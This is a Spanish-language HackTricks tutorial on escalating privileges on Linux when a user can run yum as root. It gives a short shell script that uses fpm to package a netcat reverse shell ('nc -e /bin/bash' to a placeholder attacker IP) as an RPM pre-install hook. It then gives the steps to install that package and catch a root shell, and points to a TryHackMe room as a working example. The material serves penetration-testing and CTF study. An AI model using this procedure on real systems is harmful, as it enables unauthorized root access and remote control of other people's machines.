hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

3.9 KiB

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

Se pueden encontrar más ejemplos relacionados con yum en gtfobins.

Ejecutando comandos arbitrarios a través de Paquetes RPM

Verificando el Entorno

Para aprovechar este vector, el usuario debe poder ejecutar comandos yum como un usuario con privilegios más altos, es decir, root.

Un ejemplo funcional de este vector

Un ejemplo funcional de esta explotación se puede encontrar en la sala daily bugle en tryhackme.

Empaquetando un RPM

En la siguiente sección, cubriré cómo empaquetar un shell inverso en un RPM utilizando fpm.

El ejemplo a continuación crea un paquete que incluye un desencadenador antes de la instalación con un script arbitrario que puede ser definido por el atacante. Cuando se instala, este paquete ejecutará el comando arbitrario. He utilizado un ejemplo simple de shell netcat inverso para la demostración, pero esto se puede cambiar según sea necesario.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Capturando una shell

Utilizando el ejemplo anterior y asumiendo que yum se puede ejecutar como un usuario con privilegios más altos.

  1. Transferir el rpm al host
  2. Iniciar un escucha en tu host local, como el ejemplo de escucha de netcat
  3. Instalar el paquete vulnerable yum localinstall -y exploited-1.0-1.noarch.rpm
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: